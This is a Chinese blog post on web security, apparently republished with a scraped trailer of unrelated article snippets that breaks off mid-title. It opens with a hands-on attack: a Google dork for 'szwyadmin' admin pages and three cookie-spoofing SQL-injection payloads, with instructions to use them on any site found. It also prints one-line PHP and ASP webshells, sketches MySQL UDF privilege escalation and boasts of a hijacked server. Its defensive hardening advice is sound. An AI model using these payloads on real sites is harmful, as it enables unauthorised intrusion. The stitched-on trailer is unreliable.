“如何Web安全”?
从勒索病毒就可以看出,其实病毒离我们并不远……
一、引言
随着对黑客浅略地了解,慢慢知道了这个鬼东西是一个多么可怕的存在。
希望能通过这篇文章,让一些和之前的我一样没有对黑客一词引起重视的人,加深一下对这方面的了解和关注!
接下来就以第一人称 “我们”
来代表黑客,谈谈Web安全吧(个人拙见)!
二、小试验
为达到抛砖引玉的效果,我们来动手做个小试验,用简单的方法进入网站后台管理系统,只需三步:
- 浏览器,谷歌搜索
inurl:szwyadmin/login.asp
,随便点击进入一个网站; - 我们会在地址栏键入以下,并Enter:
javascript:alert(document.cookie="adminuser="+escape("'or'='or'")); javascript:alert(document.cookie="adminpass="+escape("'or'='or'")); javascript:alert(document.cookie="admindj="+escape("1")); 复制代码
- 关闭弹窗,把之前地址栏的
login.asp
改为admin_index.asp
,Enter一下! OK,现在我们就已经进入后台管理系统了!
由上可看出,使用Cookie欺骗+SQL注入的这么3条JS语句(payload
),就可以打开后台管理系统的大门。
不注重安全的网站是多么作死的一件事啊……
三、专业词
一句话木马
:网页木马的一种,代码类似于 “<%execute request("value")%>” 。因代码短小(一般只有一句话 )而得名,主要用于拿取WebShell。WebShell
:以asp、php、jsp或者cgi等网页文件形式存在,也可以将其称做为一种网页后门。 可以使用浏览器来访问它,以得到一个命令执行环境,以达到控制网站服务器的目的。XSS
:恶意攻击者往Web页面里插入恶意Script代码
,当用户浏览该页面时,嵌入其中的Script代码将被执行,从而达到恶意攻击的目的。SQL注入
: 攻击者构造恶意SQL语句
,随HTTP请求一起传入服务器,以达到操纵数据库的目的(如上面的'or'='or'即是一次最简单的SQL注入)。肉鸡
: 肉鸡也称傀儡机,是指可以被黑客远程控制的机器。黑客常常通过种植木马,来达到远控的目的。方式有很多:CobaltStrike等制作恶意Word文件,点击中马、通过WebShell上传木马、邮件中马……
四、内容总览
so,就以我目前了解的程度(入门级 o(∩_∩)o),从以下三方面来谈谈在下对 Web安全的一些看法:
- 服务器安全
- Web后台安全
- 初识黑客
五、服务器安全
1、“Secure by Default” 原则
事实上,Secure by Default 原则也可以归纳为白名单黑名单思想。
如果更多地使用白名单,那么系统就会变得更安全。 一白帽子讲 Web安全
复制代码
举个例子吧:
某天你发现你服务器的 C:\Users\ 目录(或Linux的 /home/ 目录下)多出了一个陌生的文件夹?
复制代码
这通常说明:你的服务器已被 “我们”
登录过了,那么,该怎么办呢?
通过如Windows的事件查看器等来查到 “我们” 的IP;
防火墙增加一条入站规则:限制该IP使用3389端口(远程桌面,Linux为22端口)。
复制代码
以上便是黑名单思想!
同样,我们也可以预见:黑名单方式并不能真正解决问题!
因为 “我们”
完全可以通过已控肉鸡为跳板,或直接使用代理的方式来更换IP。
所以大家应该更多地去使用白名单策略。
配置防火墙只允许特定IP访问,具体配置顺序是先拒绝所有IP,然后允许某些特定IP访问。以下是具体命令:
#Windows
netsh firewall set portopening TCP 3389 远程桌面 ENABLE CUSTOM [允许访问的IP]
#Linux,IP格式也支持形如 192.168.0.0/16 的掩码方式的IP段
-A INPUT -p tcp -m state --state NEW -m tcp --dport 22 -s [允许访问的IP] -j ACCEPT
复制代码
2、软件默认值
大家都知道的一些常用软件的默认端口:3306、1433、1521、3690、6379、5938 等。
以上这些,你们知道, “我们”
也知道。这些端口都有可能被 “我们”
拿来做大范围IP段的端口漏洞扫描!
所以,可以考虑修改一下某些重要软件的默认端口。这样可以躲避大多数的常规扫描。
还是举个例子,以下是 护卫神 默认安装后的首页,里面的默认参数百出:
就问一句,这种东西,你怕不怕?3、个人的安全意识
举个例子:
这个是全球知名的漏洞平台:exploit-db
网站上面公布的某个漏洞(这不禁又让我想起了被封掉的乌云平台)。
2018年9月份公布的一个关于JQ上传插件的一个0 day漏洞
:
-
何为0 day? 说白了就是第一手漏洞,系统商甚至都还完全不知情。这类漏洞危害很大,甚至被黑客们用了好几年,才被公布出来!
-
用这个漏洞可以干嘛? 很简单:非常容易地上传一句话网马、拿到WebShell、后提权、种植木马、留下后门……
-
简单到什么程度? 随便一个会用 Postman 的人都能上传!
好了,所以说,个人安全意识也很重要!
例中可以看到,某些网站会经常性地披露漏洞。而如果这些漏洞被“我们”
利用,制作了相应的木马。而你的服务器(包括个人PC)刚好还未进行系统升级或打上相应的补丁,那么你就有可能会成为“我们”
的肉鸡。
所以,有意识地为系统升级、打打补丁、逛逛 Hacker News,还是很有必要的!
另外,一些杀毒软件你也是应该安装的。现在的杀毒软件能杀掉大部分的流行病毒。
而作为服务器,安全狗、护卫神这类防御软件也是需要的,它们除了拥有攻击防护的功能之外,还能找到杀毒软件无法查杀的一句话木马。
最后还得友情提醒一句:尽量不要在你的服务器上进行一些敏感操作(如转账等),因为也许“我们”
正通过VNC Viewer、键盘记录等功能,监视、记录着你的屏幕和键盘呢……
4、访问控制
- 需要时请
给不同软件分配不同的用户
,做到垂直权限管理,即:root
>mysql
>访客
如:安装MySQL,应新建一个mysql的用户,它只拥有特定文件夹和文件的读写权限,用于数据备份和恢复。
一旦你分配了高权限给mysql,当我们爆破mysql账户密码后,就可以使用SQL语句的
dump
、outfile
命令写入木马文件到你电脑的lib\plugin
或c:\windows\system32\
等关键目录,之后即使用 udf提权 等方式,获得你电脑的超级管理员权限。
- 不同软件用户应做到水平权限管理。
1、mysql用户应无法写入文件到apache目录(防止mysql写入网页木马到网站目录,以拿取webshell); 2、apache用户无法写入文件到mysql相关目录(防止利用上传漏洞写入udf.dll等文件,从而进行 udf提权 )。
5、阿里云
针对阿里云服务器,一个叫做安全组
的功能很是好用,它将是你的第二道防火墙!
它的作用类似于电脑防火墙,可以添加允许访问的IP、IP段和端口等;也可以添加阻止访问的IP、端口。
当然安全组策略的配置也应遵守“Secure by Default” 原则!
你应该优先配置安全组策略而不是本机防火墙!
因为“我们”
一旦获得了你网站的WebShell(或服务器的反弹Shell等),那么“我们”
是可以通过命令来随意关闭你的防火墙的,但是想要操纵安全组却不行!
说到这儿,突然想起了上次的一个肉鸡服务器:
1. 他察觉到我的存在;<script src="https://localhost01.cn/js/jquery-2.0.0.min.js"></script>
2. 然后立马修改了安全组白名单;
3. 我这儿边,cmd看到他的防火墙被我关掉了,3389也一直开放着,但就是远程不上 (┬_┬) 。
复制代码
另外,阿里云盾也是一个好帮手,目前阿里云盾提供免费的DDoS防护、安骑士、弱点分析等功能。
6、其他
-
如果没有特殊需要,服务器可以考虑关闭 ICMP 协议,说白点,就是禁止ping!
- 我们的许多工具如著名的NMap等,都有支持ping扫描的模块,禁止ping可以防止一些工具的恶意扫描。
- 这样做可以防止类如 ICMP Flood的DDoS攻击。
-
如果不需要使用mysql的
dump
或outfile
函数进行数据备份,那么请考虑使用secure_file_priv
模式启动mysql。- 这是mysql的一个新特性,用来限制load、outfile、dump、load_file等函数将文件导出到指定目录(当ure_file_priv的值为null ,表示限制mysql不允许导入|导出)。
- 在mysql5.7.6后,这个参数默认为null。
“我们”
爆破过许多mysql账户密码,但是大多都是以无法导出文件而告终,这让“我们”
很伤……
六、Web后台安全
我就直接说说对于Web后台的几个小建议吧!
1、上传相关建议
-
应保证上传目录不具有可执行权限
我们可以设置上传路径
可读可写不可执行
。当然我的建议是,通过诸如Nginx服务器,为静态资源(上传的文件)配置静态资源服务器,其本质就是通过location
对url请求
和服务器物理路径
进行虚拟映射。可以的话,最好单独设置静态资源服务器的域名,这样可因浏览器同源策略的关系,使得一系列客户端攻击无效(如XSS)。
-
上传文件类型的校验操作放在服务器端
首先说说为何要进行上传类型校验,我看来原因有二:
1、限制一些无关后缀名的文件上传,导致带宽浪费和服务器性能开销;
2、防止攻击者上传xx.php或xxx.asp等网页木马,从而拿到webshell。
那为什么校验要放在服务器端进行呢?
这里我直接举个例子来说明:
1、某网站使用JS来进行上传校验,我们上传了一张包含恶意代码的图片
2、然后使用 Burpsuite 或 Wireshark 等工具对该请求进行抓包
3、拿到十六进制包文件,改掉相应数据使得上传文件后缀名变为.php或.asp
4、这样骗过了前端,上传了一句话网页木马!
2、敏感隐藏
-
后台管理入口的隐藏(包括你的phpMyAdmin)
“我们”
一旦找到了你的后台管理入口,就会使用各种技术进行爆破,后台密码爆破
、Cookie欺骗
、中转注入
等,这大大增加了网站服务器的危险系数。记得之前看过 职来职往 的一期节目,里面一个骚年当说出:找到了58同城的后台管理入口,就语惊四座!
所以,隐藏后台管理入口是一件很有必要的事情。
另外值得一提的是,把数据库和服务器进行分离将会提高服务器的安全性,因为
“我们”
有时爆破数据库后,总是苦于无法得知它的网站是什么。 当然如果条件有限,也可以使用Nginx等配置虚拟主机将其进行隔离。 -
敏感文件的隐藏
1、网站存在
robots.txt
、web.sitemap
等文件,可能会泄露网站目录结构;2、织梦默认的
xxx.com/data/admin/ver.txt
文件会泄露当前织梦系统的版本。而一般“我们”
就可以根据版本号去找相应织梦系统的漏洞,如:3、phpinfo.php等敏感文件的处理或隐藏 这个文件我得多说一下,它可以帮助
“我们”
找到你的网站在你服务器的绝对路径,这对“我们”
来说是一件非常有帮助的事。因为知晓了网站根目录的绝对路径,就可以通过SQL注入把网页木马写到你的网站目录下;4、源码和数据库备份文件的隐藏 这是非常非常重要的!尽量不要将源码文件放在网站目录中(除非设置所在文件夹访问403)。否则
“我们”
难免会使用爬虫
、目录扫描
等手段找到你的源码并下载下来,然后通过代码审计
等方式,很快找到你代码中的一些敏感的东西,比如加密规则、数据库连接密码、支付密钥等…… -
敏感配置参数的隐藏
1、支付相关的敏感参数,如商户号、支付私钥等 。
2、上传类型后缀名、禁用的函数名等敏感配置,这类配置参数,其实放在代码里就行。而织梦将其放在了数据库:
这将导致“我们”
在爆破到数据库后,通过添加允许上传的后缀名(如.php)来上传网页木马、删除禁用函数(如eval)来执行网页木马。
3、其他
-
软件漏洞的关注
1、正使用着Struts2,那么我们就有理由去关注一下Struts2的命令执行漏洞;
2、正在使用FckEditor、eWebEditor等富文本编辑器,它们给我们带来了丰富的输入,同时也给我们带来了许多的漏洞;
3、正使用Apache、Nginx、IIS,就应该了解一下Apache、IIS文件解析问题、Nginx的fastcgi的文件类型解析问题。
-
加密
1、加密时不要使用ECB模式;
2、使用HMAC-SHA1代替MD5(甚至SHA1);
3、使用随机的salts(盐)和IV(向量)。
-
代码
1、使用预编译(如Java的Preparedstatement)来防止SQL注入;
2、使用view层的
输出编码
来解决XSS攻击
七、初识黑客
前面一直在说拿WebShell、拿WebShell,那么,拿到WebShell后能做什么事情呢?
一般来说,可进行文件上传下载、执行cmd命令等等。
1、一句话木马
下面我们看看著名的一句话木马以及它的连接工具---中国菜刀(替代品:蚁剑):
#一句话木马
<?php @eval($_POST[value]);?>
复制代码
中国菜刀:
2、WebShell大马
以下是php大马进行了编码伪装后的样子:
访问却是这样:3、肉鸡
中远控木马后,成为肉鸡:
上面可以看到,基本上服务器所有者能做的,你差不多都能做了!实在做不了的,马上添加一个用户,远程桌面去做……
4、黑客需要会点啥?
- Windows的dos命令需要会点儿吧?
操作防火墙、修改注册表、操作计划任务、操作系统服务,当前还有最基本的**添加用户**和**隐藏用户**等命令。
- Linux的shell命令需要会点儿吧?
同样的添加用户、删除用户、操作iptables防火墙、vi、tar、chkconifg、chmod、ps……
- 数据库的SQL语句需要会点儿吧?
SQL注入了解一下?
- JavaScript需要会点儿吧?
JS不会,你搞什么XSS?搞什么CSRF?
- 加密与解密懂点吧?
爆破是一门技术活,熟悉加密算法、拥有好的字典、牛逼的社会工程学知识都能让你在爆破速度上面有质的提升。
- php、asp、java这些得懂点儿吧?
网马不就是利用这些语言脚本写出来的嘛。另外比如c++,灰鸽子和很多木马工具也是通过c++写的,不了解一下就只能长期买别人的远控软件,甚至还带着别人的后门木马……
- 一些会用到的计算机网络知识
如dns、tcp(tcp的syn)、udp、icmp、http等,在进行dns隧道、DDoS、网络嗅探、arp欺骗等都用得着。
- 一些技术性的东西
如免杀技术、提权、渗透技术、爬虫、抓包分析等。
- 不怕蹲监狱的心……
如若内容造成侵权/违法违规/事实不符,请联系编程学习网邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
相关文章
- 一文读懂JavaScript和ECMAScript
一文读懂JavaScript和ECMAScriptJavaScript发展简史JavaScript开发时间线为什么需要ECMAScript?总结参考 对于初学者,JavaScript和ECMAScript往往使他们迷惑,这甚至使我怀疑自己并没有学习最新的版本,因此,我决定沉下心对这两个概念做一番研究,最后得出了一些结论,希望能…...
2024/3/27 14:29:41 - 工作流和规则引擎的区别
这两个引擎的重要作用之一是模块分离。 JBPM把工作流程分离出来,比如一个请假流程,从员工申请->经理批准->提交人事部备案,这个流程就可以用xml来描述,其中每一步都可以用java class或者页面实现。在协同开发的时候就很有好处,因为不懂IT的人也可以描述流程,而具体…...
2024/3/13 16:39:28 - ***技术的发展与WEB服务器的8大***方式
WEB服务器面临威胁在了解WEB服务器的安全状况之前,首先要让大家了解网站安全的另一面——******。 <?xml:namespace prefix = o ns = "urn:schemas-microsoft-com:office:office" /> 97至98年互联网开始在中国兴起之时,***就已经诞生了,在98年印尼排华事件…...
2024/3/19 16:24:52 - 动态工作流引擎
google 开源工作流引擎 http://www.oschina.net/project/tag/129/workflow 介绍一个开源的工作流引擎 Fire workflow http://simpleframework.net/blog/v/7796.htmlpetri网在工作流引擎中的应用 查找文献http://space.itpub.net/139793/viewspace-605154 [轉] 开源工作流引擎介…...
2024/3/19 14:42:38 - 互评Alpha版本——基于spec评论作品
组名:可以低头,但没必要 组长:付佳 组员:张俊余 李文涛 孙赛佳 田良 于洋 刘欣 段晓睿一、二次元梦之队----I DO 在测评该项目时,我们组索要了该组的apk程序,安装之后我就开始进行测试。 这款软件画风比较简洁,采用问答形式过关,过关后可以查看一部分故事,通关后…...
2024/3/22 2:35:07 - JavaScript 拾碎[一] ECMAScript 简介
ECMAScript 简介 ECMAScript 是一种由欧洲计算机制造商协会( ECMA ) 通过 ECMAScript-262 标准化的脚本程序设计语言。 1998 年,国际标准化组织及国际电工委员会( ISO / IEC ) 采纳这一脚本语言的标准( ISO / IEC-16262 )。 ECMAScript 描述的只是语法、类型、语句、关键字、保…...
2024/3/18 1:12:50 - Windows作为Web服务器的安全设置攻略
// by redice // 2009.9.17 //转自 http://www.redicecn.cn // 辛勤劳动成果,转载请保留上述信息 一句废话:服务器安全问题是一个令人头痛的问题,也是一个无法回避的问题... 经过实验总计如下:NTFS权限设置要先设置父目录,再设置子目录,因为设置继承权限时,父目录的权限…...
2024/3/15 20:53:23 - ECMAScript版本特性
ECMAScript是一种由Ecma国际(前身为欧洲计算机制造商协会)制定和发布的脚本语言规范,JavaScript在它的基础上进行了自己的封装。也就是说可以吧JavaScript看成是对ECMAScript的实现。 版本: ECMAScript 1 1997年6月发布,本质上与javascript 1.1 相同 ECMAScript 2 1998年6…...
2024/3/15 20:53:22 - 基于图的任务流引擎GraphScheduleEngine
GraphScheduleEngine是什么:GraphScheduleEngine是一个基于DAG图的任务流引擎,不同语言编写、运行于不同机器上的模块、程序,均可以通过订阅GraphScheduleEngine的消息来启动、运行、结束自身的任务。开发GraphScheduleEngine的初衷:在数据挖掘、推荐引擎的离线计算等任务中…...
2024/3/15 6:50:11 - h3c路由器msr2600-10,msr3600-28调试记录
msr2600-10:(V5)1、开通web服务h3c路由器怎么开启web功能 https://zhidao.baidu.com/question/1924960621185343867.htmlh3c路由器怎么开启web功能 https://wenku.baidu.com/view/191d8a8dbceb19e8b8f6bad2.html2、增加wan口,lan口切换为wan口sys——interface gigabitethe…...
2024/3/15 20:53:21 - 关于职业规划
出来工作两年半,对自己想从事什么行业还是有点模糊。曾以为自己想做一名软件工程师,可能是因为名头好听。而事实上我还没有达到做一名软件工程师的条件。到目前为止,除了对C语言比较熟悉,其他什么的好像都不了解。对一门语言再熟悉也不能成为一个优秀的软件工程师。而且我似…...
2024/3/15 20:53:21 - ECMAScript全面了解
解释ECMAScript是一种由欧洲计算机制造商协会(ECMA)通过ECMA-262标准化的脚本程序设计语言。这种语言在万维网上应用广泛,它往往被称为JavaScript或JScript,但实际上后两者是ECMA-262标准的扩展。 历史1995年12月 太阳公司(SUN)与网景通讯公司(Netscape)一起引入了JavaScr…...
2024/3/15 20:53:19 - Alex 的 Hadoop 菜鸟教程: 第20课 工作流引擎 Oozie
本文基于 Centos6.x + CDH5.xOozie是什么简单的说Oozie是一个工作流引擎。只不过它是一个基于Hadoop的工作流引擎,在实际工作中,遇到对数据进行一连串的操作的时候很实用,不需要自己写一些处理代码了,只需要定义好各个action,然后把他们串在一个工作流里面就可以自动执行了…...
2024/3/15 20:53:18 - 6、端口转发流量操控工具总结
运用情景:在 Web 安全渗透测试经常会面临的一个问题,同时也是 Web 服务器加固方面一个很重要的部分,那就是 Web 服务器对外只开放一个 80 端口。Web 服务器的安全防护可以是操作系统的端口定制或者是网管防火前的端口定制。这时渗透测试人员如果想进一步测试内网的话必须先拿…...
2024/3/24 10:55:40 - 随便说说
什么是需求,这个需求是根据什么来制订的?需求的内容是否就是完整的需求者所需的一切描述?很多时候,软件需求者自己都弄不清楚自己究竟需要一个什么样的软件。以游戏为例,从很抽象的概念来说,游戏玩家需要的是一个好玩的,能够打发时间的,可以从中得到乐趣的游戏,而游戏…...
2024/3/15 20:53:16 - BPM之工作流
目前公司在进行网站重构,需要将工作流系统整合到新开发的系统中,在项目的开始阶段,宏天的BPMX3和普元的BPS业务流程管理系统在评估计划中,因此我对这两个系统有了一个浅显的研究,在这里做一个小小的总结。首先,给出一些常用语的解释:SOA(面向服务的架构) 面向服务架构…...
2024/3/15 20:53:15 - JavaScript基础 -- ECMAscript
ECMAScript是一种由Ecma国际(前身为欧洲计算机制造商协会,英文名称是European Computer Manufacturers Association)通过ECMA-262标准化的脚本程序设计语言。这种语言在万维网上应用广泛,它往往被称为JavaScript或JScript,但实际上后两者是ECMA-262标准的实现和扩展。ECMAS…...
2024/3/15 20:53:13 - Web服务器安全强化(思路)
本文只是提供给大家一个思路,并没有详实具体的操作方法。 很明显,只做强系统是不行的,还得有其它更为强劲的保护措施,但本文只讨论2003的加强。-----------------------------------1、 删除IIS安装完成后在wwwroot下默认…...
2024/3/15 20:53:12 - 你了解ECMAScript吗?
一、基本概念ECMA,European Computer Manufacturers Association,欧洲计算机制造协会。 TC39,Technical Committee 39,ECMA的第39号技术专家委员会,负责制订ECMAScript,成员由Microsoft、Mozilla、Google等各个主流浏览器厂商的代表组成。 ECMAScript正式名称为ECMA-262,…...
2024/3/15 20:53:13 - MPQ文件系统优化(续)
天啊, 自己解析(listfile)本身就是一个错误! 因为StormLib在打开MPQ文件时就已经自己解析过了, 没必要多此一举! 而且, 虽然自己缓存一下文件树会加快查找和枚举的速度, 但是, 从字符串构造这个棵树的时间太长了~~~ 这就导致了一个很严重的问题: 启动速度慢....... 对于文件树,…...
2024/3/15 20:53:11
最新文章
- 【测试开发学习历程】Python数据类型:字符串-str(上)
目录 1 Python中的引号 2 字符串的声明 3 字符串的切片 4 字符串的常用函数 4.1 len()函数 4.2 ord()函数 4.3 chr()函数 5 字符串的常用方法(内置方法/内建方法) 5.1 find()方法 5.2 index()方法 5.3 rfind()方法 5.4 rindex()方法 1 Python…...
2024/3/29 8:13:58 - 梯度消失和梯度爆炸的一些处理方法
在这里是记录一下梯度消失或梯度爆炸的一些处理技巧。全当学习总结了如有错误还请留言,在此感激不尽。 权重和梯度的更新公式如下: w w − η ⋅ ∇ w w w - \eta \cdot \nabla w ww−η⋅∇w 个人通俗的理解梯度消失就是网络模型在反向求导的时候出…...
2024/3/20 10:50:27 - JAVA实战开源项目:厦门旅游电子商务预订系统(Vue+SpringBoot)
目录 一、摘要1.1 项目介绍1.2 项目录屏 二、功能模块2.1 景点类型模块2.2 景点档案模块2.3 酒店管理模块2.4 美食管理模块 三、系统设计3.1 用例设计3.2 数据库设计3.2.1 学生表3.2.2 学生表3.2.3 学生表3.2.4 学生表 四、系统展示五、核心代码5.1 新增景点类型5.2 查询推荐的…...
2024/3/28 16:08:43 - CrossOver 23 用户可以免费升级到 CrossOver24吗?CrossOver用户如何升级呢?
也就是上个月(2024年2月底)左右,CrossOver 刚刚更新了 24 版本,CrossOver更新的内容有哪些,大家可以参考这篇文章:CrossOver24.0新功能介绍,这篇文章详细介绍了CrossOver24有哪些新特点…...
2024/3/27 3:44:15 - 【外汇早评】美通胀数据走低,美元调整
原标题:【外汇早评】美通胀数据走低,美元调整昨日美国方面公布了新一期的核心PCE物价指数数据,同比增长1.6%,低于前值和预期值的1.7%,距离美联储的通胀目标2%继续走低,通胀压力较低,且此前美国一季度GDP初值中的消费部分下滑明显,因此市场对美联储后续更可能降息的政策…...
2024/3/27 10:21:24 - 【原油贵金属周评】原油多头拥挤,价格调整
原标题:【原油贵金属周评】原油多头拥挤,价格调整本周国际劳动节,我们喜迎四天假期,但是整个金融市场确实流动性充沛,大事频发,各个商品波动剧烈。美国方面,在本周四凌晨公布5月份的利率决议和新闻发布会,维持联邦基金利率在2.25%-2.50%不变,符合市场预期。同时美联储…...
2024/3/24 20:11:25 - 【外汇周评】靓丽非农不及疲软通胀影响
原标题:【外汇周评】靓丽非农不及疲软通胀影响在刚结束的周五,美国方面公布了新一期的非农就业数据,大幅好于前值和预期,新增就业重新回到20万以上。具体数据: 美国4月非农就业人口变动 26.3万人,预期 19万人,前值 19.6万人。 美国4月失业率 3.6%,预期 3.8%,前值 3…...
2024/3/29 2:45:46 - 【原油贵金属早评】库存继续增加,油价收跌
原标题:【原油贵金属早评】库存继续增加,油价收跌周三清晨公布美国当周API原油库存数据,上周原油库存增加281万桶至4.692亿桶,增幅超过预期的74.4万桶。且有消息人士称,沙特阿美据悉将于6月向亚洲炼油厂额外出售更多原油,印度炼油商预计将每日获得至多20万桶的额外原油供…...
2024/3/24 20:11:23 - 【外汇早评】日本央行会议纪要不改日元强势
原标题:【外汇早评】日本央行会议纪要不改日元强势近两日日元大幅走强与近期市场风险情绪上升,避险资金回流日元有关,也与前一段时间的美日贸易谈判给日本缓冲期,日本方面对汇率问题也避免继续贬值有关。虽然今日早间日本央行公布的利率会议纪要仍然是支持宽松政策,但这符…...
2024/3/29 5:19:52 - 【原油贵金属早评】欧佩克稳定市场,填补伊朗问题的影响
原标题:【原油贵金属早评】欧佩克稳定市场,填补伊朗问题的影响近日伊朗局势升温,导致市场担忧影响原油供给,油价试图反弹。此时OPEC表态稳定市场。据消息人士透露,沙特6月石油出口料将低于700万桶/日,沙特已经收到石油消费国提出的6月份扩大出口的“适度要求”,沙特将满…...
2024/3/28 17:01:12 - 【外汇早评】美欲与伊朗重谈协议
原标题:【外汇早评】美欲与伊朗重谈协议美国对伊朗的制裁遭到伊朗的抗议,昨日伊朗方面提出将部分退出伊核协议。而此行为又遭到欧洲方面对伊朗的谴责和警告,伊朗外长昨日回应称,欧洲国家履行它们的义务,伊核协议就能保证存续。据传闻伊朗的导弹已经对准了以色列和美国的航…...
2024/3/24 5:55:47 - 【原油贵金属早评】波动率飙升,市场情绪动荡
原标题:【原油贵金属早评】波动率飙升,市场情绪动荡因中美贸易谈判不安情绪影响,金融市场各资产品种出现明显的波动。随着美国与中方开启第十一轮谈判之际,美国按照既定计划向中国2000亿商品征收25%的关税,市场情绪有所平复,已经开始接受这一事实。虽然波动率-恐慌指数VI…...
2024/3/29 1:13:26 - 【原油贵金属周评】伊朗局势升温,黄金多头跃跃欲试
原标题:【原油贵金属周评】伊朗局势升温,黄金多头跃跃欲试美国和伊朗的局势继续升温,市场风险情绪上升,避险黄金有向上突破阻力的迹象。原油方面稍显平稳,近期美国和OPEC加大供给及市场需求回落的影响,伊朗局势并未推升油价走强。近期中美贸易谈判摩擦再度升级,美国对中…...
2024/3/26 23:04:51 - 【原油贵金属早评】市场情绪继续恶化,黄金上破
原标题:【原油贵金属早评】市场情绪继续恶化,黄金上破周初中国针对于美国加征关税的进行的反制措施引发市场情绪的大幅波动,人民币汇率出现大幅的贬值动能,金融市场受到非常明显的冲击。尤其是波动率起来之后,对于股市的表现尤其不安。隔夜美国股市出现明显的下行走势,这…...
2024/3/29 7:41:19 - 【外汇早评】美伊僵持,风险情绪继续升温
原标题:【外汇早评】美伊僵持,风险情绪继续升温昨日沙特两艘油轮再次发生爆炸事件,导致波斯湾局势进一步恶化,市场担忧美伊可能会出现摩擦生火,避险品种获得支撑,黄金和日元大幅走强。美指受中美贸易问题影响而在低位震荡。继5月12日,四艘商船在阿联酋领海附近的阿曼湾、…...
2024/3/24 20:11:18 - 【原油贵金属早评】贸易冲突导致需求低迷,油价弱势
原标题:【原油贵金属早评】贸易冲突导致需求低迷,油价弱势近日虽然伊朗局势升温,中东地区几起油船被袭击事件影响,但油价并未走高,而是出于调整结构中。由于市场预期局势失控的可能性较低,而中美贸易问题导致的全球经济衰退风险更大,需求会持续低迷,因此油价调整压力较…...
2024/3/28 9:10:53 - 氧生福地 玩美北湖(上)——为时光守候两千年
原标题:氧生福地 玩美北湖(上)——为时光守候两千年一次说走就走的旅行,只有一张高铁票的距离~ 所以,湖南郴州,我来了~ 从广州南站出发,一个半小时就到达郴州西站了。在动车上,同时改票的南风兄和我居然被分到了一个车厢,所以一路非常愉快地聊了过来。 挺好,最起…...
2024/3/29 0:49:46 - 氧生福地 玩美北湖(中)——永春梯田里的美与鲜
原标题:氧生福地 玩美北湖(中)——永春梯田里的美与鲜一觉醒来,因为大家太爱“美”照,在柳毅山庄去寻找龙女而错过了早餐时间。近十点,向导坏坏还是带着饥肠辘辘的我们去吃郴州最富有盛名的“鱼头粉”。说这是“十二分推荐”,到郴州必吃的美食之一。 哇塞!那个味美香甜…...
2024/3/24 20:11:15 - 氧生福地 玩美北湖(下)——奔跑吧骚年!
原标题:氧生福地 玩美北湖(下)——奔跑吧骚年!让我们红尘做伴 活得潇潇洒洒 策马奔腾共享人世繁华 对酒当歌唱出心中喜悦 轰轰烈烈把握青春年华 让我们红尘做伴 活得潇潇洒洒 策马奔腾共享人世繁华 对酒当歌唱出心中喜悦 轰轰烈烈把握青春年华 啊……啊……啊 两…...
2024/3/27 7:12:50 - 扒开伪装医用面膜,翻六倍价格宰客,小姐姐注意了!
原标题:扒开伪装医用面膜,翻六倍价格宰客,小姐姐注意了!扒开伪装医用面膜,翻六倍价格宰客!当行业里的某一品项火爆了,就会有很多商家蹭热度,装逼忽悠,最近火爆朋友圈的医用面膜,被沾上了污点,到底怎么回事呢? “比普通面膜安全、效果好!痘痘、痘印、敏感肌都能用…...
2024/3/24 20:11:13 - 「发现」铁皮石斛仙草之神奇功效用于医用面膜
原标题:「发现」铁皮石斛仙草之神奇功效用于医用面膜丽彦妆铁皮石斛医用面膜|石斛多糖无菌修护补水贴19大优势: 1、铁皮石斛:自唐宋以来,一直被列为皇室贡品,铁皮石斛生于海拔1600米的悬崖峭壁之上,繁殖力差,产量极低,所以古代仅供皇室、贵族享用 2、铁皮石斛自古民间…...
2024/3/26 11:21:23 - 丽彦妆\医用面膜\冷敷贴轻奢医学护肤引导者
原标题:丽彦妆\医用面膜\冷敷贴轻奢医学护肤引导者【公司简介】 广州华彬企业隶属香港华彬集团有限公司,专注美业21年,其旗下品牌: 「圣茵美」私密荷尔蒙抗衰,产后修复 「圣仪轩」私密荷尔蒙抗衰,产后修复 「花茵莳」私密荷尔蒙抗衰,产后修复 「丽彦妆」专注医学护…...
2024/3/28 18:26:34 - 广州械字号面膜生产厂家OEM/ODM4项须知!
原标题:广州械字号面膜生产厂家OEM/ODM4项须知!广州械字号面膜生产厂家OEM/ODM流程及注意事项解读: 械字号医用面膜,其实在我国并没有严格的定义,通常我们说的医美面膜指的应该是一种「医用敷料」,也就是说,医用面膜其实算作「医疗器械」的一种,又称「医用冷敷贴」。 …...
2024/3/28 12:42:28 - 械字号医用眼膜缓解用眼过度到底有无作用?
原标题:械字号医用眼膜缓解用眼过度到底有无作用?医用眼膜/械字号眼膜/医用冷敷眼贴 凝胶层为亲水高分子材料,含70%以上的水分。体表皮肤温度传导到本产品的凝胶层,热量被凝胶内水分子吸收,通过水分的蒸发带走大量的热量,可迅速地降低体表皮肤局部温度,减轻局部皮肤的灼…...
2024/3/28 20:09:10 - 配置失败还原请勿关闭计算机,电脑开机屏幕上面显示,配置失败还原更改 请勿关闭计算机 开不了机 这个问题怎么办...
解析如下:1、长按电脑电源键直至关机,然后再按一次电源健重启电脑,按F8健进入安全模式2、安全模式下进入Windows系统桌面后,按住“winR”打开运行窗口,输入“services.msc”打开服务设置3、在服务界面,选中…...
2022/11/19 21:17:18 - 错误使用 reshape要执行 RESHAPE,请勿更改元素数目。
%读入6幅图像(每一幅图像的大小是564*564) f1 imread(WashingtonDC_Band1_564.tif); subplot(3,2,1),imshow(f1); f2 imread(WashingtonDC_Band2_564.tif); subplot(3,2,2),imshow(f2); f3 imread(WashingtonDC_Band3_564.tif); subplot(3,2,3),imsho…...
2022/11/19 21:17:16 - 配置 已完成 请勿关闭计算机,win7系统关机提示“配置Windows Update已完成30%请勿关闭计算机...
win7系统关机提示“配置Windows Update已完成30%请勿关闭计算机”问题的解决方法在win7系统关机时如果有升级系统的或者其他需要会直接进入一个 等待界面,在等待界面中我们需要等待操作结束才能关机,虽然这比较麻烦,但是对系统进行配置和升级…...
2022/11/19 21:17:15 - 台式电脑显示配置100%请勿关闭计算机,“准备配置windows 请勿关闭计算机”的解决方法...
有不少用户在重装Win7系统或更新系统后会遇到“准备配置windows,请勿关闭计算机”的提示,要过很久才能进入系统,有的用户甚至几个小时也无法进入,下面就教大家这个问题的解决方法。第一种方法:我们首先在左下角的“开始…...
2022/11/19 21:17:14 - win7 正在配置 请勿关闭计算机,怎么办Win7开机显示正在配置Windows Update请勿关机...
